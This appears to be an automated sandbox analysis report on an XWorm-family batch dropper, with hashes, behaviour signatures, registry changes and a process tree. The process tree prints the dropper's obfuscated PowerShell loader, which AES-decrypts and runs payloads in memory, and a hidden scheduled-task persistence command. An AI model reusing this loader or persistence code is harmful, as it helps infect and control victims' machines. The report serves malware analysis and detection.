Analysis
-
max time kernel
11s -
max time network
17s -
platform
windows11-21h2_x64 -
resource
win11-20250218-en -
resource tags
arch:x64arch:x86image:win11-20250218-enlocale:en-usos:windows11-21h2-x64system -
submitted
08/03/2025, 00:09
Static task
static1
Behavioral task
behavioral1
Sample
RedwareTemp.bat
Resource
win11-20250218-en
General
-
Target
RedwareTemp.bat
-
Size
548KB
-
MD5
73c36e7e75e989f8b1e5dd4e9a1b493d
-
SHA1
af5bf582a6d1b424355f8af579b8f202fbe4b834
-
SHA256
2b0fa86f46148d25d365085a021a9b836e34275955ca0446723553bbcf388ac0
-
SHA512
5c95fcfb41ca505ca2a9d7d0f11d4e57831bfabd5e1c741c6bf26b0b2a89e36524cca53e6eff3ad7ccac14c0030ab0fc76581275ee8acfe0304be216a6e6ec44
-
SSDEEP
12288:FTiR+PqY3LWerg7f9AqvSU84kI3Hu+MoovimheIBVXMTT:RhAfcidQ6mEy8P
Malware Config
Extracted
xworm
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/3264-150-0x0000000003D70000-0x0000000003D82000-memory.dmp family_xworm -
Xworm family
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 1672 powershell.exe 3596 powershell.exe 1360 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4064 RedwareTemp.exe -
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 18 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133858661891984509" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData svchost.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2287204051-441334380-1151193565-1000\{CD976278-C9E3-471F-8822-5734B023468B} explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App svchost.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133843453184880782" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe -
Suspicious behavior: EnumeratesProcesses 41 IoCs
pid Process 1672 powershell.exe 1672 powershell.exe 3596 powershell.exe 3596 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 4064 RedwareTemp.exe 4064 RedwareTemp.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 3872 svchost.exe 3872 svchost.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1672 powershell.exe Token: SeDebugPrivilege 3596 powershell.exe Token: SeIncreaseQuotaPrivilege 3596 powershell.exe Token: SeSecurityPrivilege 3596 powershell.exe Token: SeTakeOwnershipPrivilege 3596 powershell.exe Token: SeLoadDriverPrivilege 3596 powershell.exe Token: SeSystemProfilePrivilege 3596 powershell.exe Token: SeSystemtimePrivilege 3596 powershell.exe Token: SeProfSingleProcessPrivilege 3596 powershell.exe Token: SeIncBasePriorityPrivilege 3596 powershell.exe Token: SeCreatePagefilePrivilege 3596 powershell.exe Token: SeBackupPrivilege 3596 powershell.exe Token: SeRestorePrivilege 3596 powershell.exe Token: SeShutdownPrivilege 3596 powershell.exe Token: SeDebugPrivilege 3596 powershell.exe Token: SeSystemEnvironmentPrivilege 3596 powershell.exe Token: SeRemoteShutdownPrivilege 3596 powershell.exe Token: SeUndockPrivilege 3596 powershell.exe Token: SeManageVolumePrivilege 3596 powershell.exe Token: 33 3596 powershell.exe Token: 34 3596 powershell.exe Token: 35 3596 powershell.exe Token: 36 3596 powershell.exe Token: SeIncreaseQuotaPrivilege 3596 powershell.exe Token: SeSecurityPrivilege 3596 powershell.exe Token: SeTakeOwnershipPrivilege 3596 powershell.exe Token: SeLoadDriverPrivilege 3596 powershell.exe Token: SeSystemProfilePrivilege 3596 powershell.exe Token: SeSystemtimePrivilege 3596 powershell.exe Token: SeProfSingleProcessPrivilege 3596 powershell.exe Token: SeIncBasePriorityPrivilege 3596 powershell.exe Token: SeCreatePagefilePrivilege 3596 powershell.exe Token: SeBackupPrivilege 3596 powershell.exe Token: SeRestorePrivilege 3596 powershell.exe Token: SeShutdownPrivilege 3596 powershell.exe Token: SeDebugPrivilege 3596 powershell.exe Token: SeSystemEnvironmentPrivilege 3596 powershell.exe Token: SeRemoteShutdownPrivilege 3596 powershell.exe Token: SeUndockPrivilege 3596 powershell.exe Token: SeManageVolumePrivilege 3596 powershell.exe Token: 33 3596 powershell.exe Token: 34 3596 powershell.exe Token: 35 3596 powershell.exe Token: 36 3596 powershell.exe Token: SeIncreaseQuotaPrivilege 3596 powershell.exe Token: SeSecurityPrivilege 3596 powershell.exe Token: SeTakeOwnershipPrivilege 3596 powershell.exe Token: SeLoadDriverPrivilege 3596 powershell.exe Token: SeSystemProfilePrivilege 3596 powershell.exe Token: SeSystemtimePrivilege 3596 powershell.exe Token: SeProfSingleProcessPrivilege 3596 powershell.exe Token: SeIncBasePriorityPrivilege 3596 powershell.exe Token: SeCreatePagefilePrivilege 3596 powershell.exe Token: SeBackupPrivilege 3596 powershell.exe Token: SeRestorePrivilege 3596 powershell.exe Token: SeShutdownPrivilege 3596 powershell.exe Token: SeDebugPrivilege 3596 powershell.exe Token: SeSystemEnvironmentPrivilege 3596 powershell.exe Token: SeRemoteShutdownPrivilege 3596 powershell.exe Token: SeUndockPrivilege 3596 powershell.exe Token: SeManageVolumePrivilege 3596 powershell.exe Token: 33 3596 powershell.exe Token: 34 3596 powershell.exe Token: 35 3596 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 4012 explorer.exe 4012 explorer.exe 4012 explorer.exe -
Suspicious use of SendNotifyMessage 9 IoCs
pid Process 4012 explorer.exe 4012 explorer.exe 4012 explorer.exe 4012 explorer.exe 4012 explorer.exe 4012 explorer.exe 4012 explorer.exe 4012 explorer.exe 4012 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2708 wrote to memory of 1392 2708 cmd.exe 86 PID 2708 wrote to memory of 1392 2708 cmd.exe 86 PID 2708 wrote to memory of 1672 2708 cmd.exe 87 PID 2708 wrote to memory of 1672 2708 cmd.exe 87 PID 1672 wrote to memory of 3596 1672 powershell.exe 88 PID 1672 wrote to memory of 3596 1672 powershell.exe 88 PID 1672 wrote to memory of 1884 1672 powershell.exe 92 PID 1672 wrote to memory of 1884 1672 powershell.exe 92 PID 1884 wrote to memory of 844 1884 WScript.exe 93 PID 1884 wrote to memory of 844 1884 WScript.exe 93 PID 844 wrote to memory of 4376 844 cmd.exe 95 PID 844 wrote to memory of 4376 844 cmd.exe 95 PID 844 wrote to memory of 1360 844 cmd.exe 96 PID 844 wrote to memory of 1360 844 cmd.exe 96 PID 1360 wrote to memory of 3264 1360 powershell.exe 53 PID 1360 wrote to memory of 2560 1360 powershell.exe 42 PID 1360 wrote to memory of 1768 1360 powershell.exe 30 PID 1360 wrote to memory of 2552 1360 powershell.exe 41 PID 1360 wrote to memory of 1616 1360 powershell.exe 27 PID 1360 wrote to memory of 1076 1360 powershell.exe 69 PID 1360 wrote to memory of 2152 1360 powershell.exe 38 PID 1360 wrote to memory of 2740 1360 powershell.exe 46 PID 1360 wrote to memory of 1156 1360 powershell.exe 17 PID 1360 wrote to memory of 948 1360 powershell.exe 11 PID 1360 wrote to memory of 1932 1360 powershell.exe 34 PID 1360 wrote to memory of 1732 1360 powershell.exe 29 PID 1360 wrote to memory of 1924 1360 powershell.exe 33 PID 1360 wrote to memory of 3520 1360 powershell.exe 72 PID 1360 wrote to memory of 4352 1360 powershell.exe 63 PID 1360 wrote to memory of 1712 1360 powershell.exe 28 PID 1360 wrote to memory of 4072 1360 powershell.exe 82 PID 1360 wrote to memory of 1508 1360 powershell.exe 25 PID 1360 wrote to memory of 1112 1360 powershell.exe 35 PID 1360 wrote to memory of 1896 1360 powershell.exe 32 PID 1360 wrote to memory of 4396 1360 powershell.exe 75 PID 1360 wrote to memory of 764 1360 powershell.exe 14 PID 1360 wrote to memory of 2668 1360 powershell.exe 44 PID 1360 wrote to memory of 3452 1360 powershell.exe 55 PID 1360 wrote to memory of 1480 1360 powershell.exe 24 PID 1360 wrote to memory of 1084 1360 powershell.exe 16 PID 1360 wrote to memory of 3016 1360 powershell.exe 51 PID 1360 wrote to memory of 3440 1360 powershell.exe 54 PID 1360 wrote to memory of 1268 1360 powershell.exe 22 PID 1360 wrote to memory of 1256 1360 powershell.exe 21 PID 1360 wrote to memory of 1248 1360 powershell.exe 20 PID 1360 wrote to memory of 1836 1360 powershell.exe 31 PID 1360 wrote to memory of 1244 1360 powershell.exe 36 PID 1360 wrote to memory of 1044 1360 powershell.exe 15 PID 1360 wrote to memory of 2224 1360 powershell.exe 39 PID 1360 wrote to memory of 3996 1360 powershell.exe 61 PID 1360 wrote to memory of 4388 1360 powershell.exe 66 PID 1360 wrote to memory of 1432 1360 powershell.exe 23 PID 1360 wrote to memory of 2404 1360 powershell.exe 40 PID 1360 wrote to memory of 2596 1360 powershell.exe 43 PID 1360 wrote to memory of 820 1360 powershell.exe 8 PID 1360 wrote to memory of 4364 1360 powershell.exe 67 PID 1360 wrote to memory of 1600 1360 powershell.exe 26 PID 1360 wrote to memory of 1008 1360 powershell.exe 12 PID 1360 wrote to memory of 1200 1360 powershell.exe 19 PID 1360 wrote to memory of 2768 1360 powershell.exe 48 PID 1360 wrote to memory of 1584 1360 powershell.exe 81 PID 1360 wrote to memory of 1188 1360 powershell.exe 18 PID 1360 wrote to memory of 2748 1360 powershell.exe 47 PID 1360 wrote to memory of 3264 1360 powershell.exe 53
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Modifies registry class
PID:820 -
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca2⤵PID:4932
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵PID:4936
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:1008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:764
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1156
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1200
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1248
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1256
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1480
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1600
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1616
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1712
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1924
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1932
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1112
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1244
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2152
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2224
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2596
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3016
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3264
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RedwareTemp.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('olj6lNDH9BP9+WoXhpaGp14B/+RuhRlVS9vcmbQmtAw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5d9Zu+yF4iwq9mJwhaRdw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dPZnK=New-Object System.IO.MemoryStream(,$param_var); $OVsRl=New-Object System.IO.MemoryStream; $Lntcu=New-Object System.IO.Compression.GZipStream($dPZnK, [IO.Compression.CompressionMode]::Decompress); $Lntcu.CopyTo($OVsRl); $Lntcu.Dispose(); $dPZnK.Dispose(); $OVsRl.Dispose(); $OVsRl.ToArray();}function execute_function($param_var,$param2_var){ $rQsSK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fhwRv=$rQsSK.EntryPoint; $fhwRv.Invoke($null, $param2_var);}$qkzrl = 'C:\Users\Admin\AppData\Local\Temp\RedwareTemp.bat';$host.UI.RawUI.WindowTitle = $qkzrl;$KRqly=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($qkzrl).Split([Environment]::NewLine);foreach ($NNMBM in $KRqly) { if ($NNMBM.StartsWith('AyaGWreXdjmRZwIZSJRC')) { $nXbFi=$NNMBM.Substring(20); break; }}$payloads_var=[string[]]$nXbFi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:1392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_872_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_872.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3596
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_872.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_872.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('olj6lNDH9BP9+WoXhpaGp14B/+RuhRlVS9vcmbQmtAw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5d9Zu+yF4iwq9mJwhaRdw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dPZnK=New-Object System.IO.MemoryStream(,$param_var); $OVsRl=New-Object System.IO.MemoryStream; $Lntcu=New-Object System.IO.Compression.GZipStream($dPZnK, [IO.Compression.CompressionMode]::Decompress); $Lntcu.CopyTo($OVsRl); $Lntcu.Dispose(); $dPZnK.Dispose(); $OVsRl.Dispose(); $OVsRl.ToArray();}function execute_function($param_var,$param2_var){ $rQsSK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fhwRv=$rQsSK.EntryPoint; $fhwRv.Invoke($null, $param2_var);}$qkzrl = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_872.bat';$host.UI.RawUI.WindowTitle = $qkzrl;$KRqly=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($qkzrl).Split([Environment]::NewLine);foreach ($NNMBM in $KRqly) { if ($NNMBM.StartsWith('AyaGWreXdjmRZwIZSJRC')) { $nXbFi=$NNMBM.Substring(20); break; }}$payloads_var=[string[]]$nXbFi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:4376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Users\Admin\AppData\Local\Temp\RedwareTemp.exe"C:\Users\Admin\AppData\Local\Temp\RedwareTemp.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4064
-
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:4388
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:1076
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4396
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:1584
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4072
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=5396,i,510155214614128252,14857291624332394009,262144 --variations-seed-version --mojo-platform-channel-handle=5480 /prefetch:141⤵PID:3028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3872
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4012
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize340B
MD5ca1da441ef9a5b624c588b7e4edcfd1a
SHA14f3971843cecf5786a4ba74de97ee8521cd586a6
SHA2560ed1dbc08402a5ab6a700a51508393364c57c47bc4298fea70cf7d43560e7a9f
SHA5125aa25d675a2200da4546cdedcc9442555739ef4df13e2539994a828da04e24d727f8ffbd6c05d92b4171b3152eee2985166dadcf619c3dca70436ba990b15e76
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD53ec0d76d886b2f4b9f1e3da7ce9e2cd7
SHA168a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea
SHA256214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5
SHA512a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\O9PSQQN7\www.bing[1].xml
Filesize15KB
MD5623c1a8b4364a7627b5ec446f6f7e919
SHA1d4db9f192f6ae54b817500213b6059555222f48a
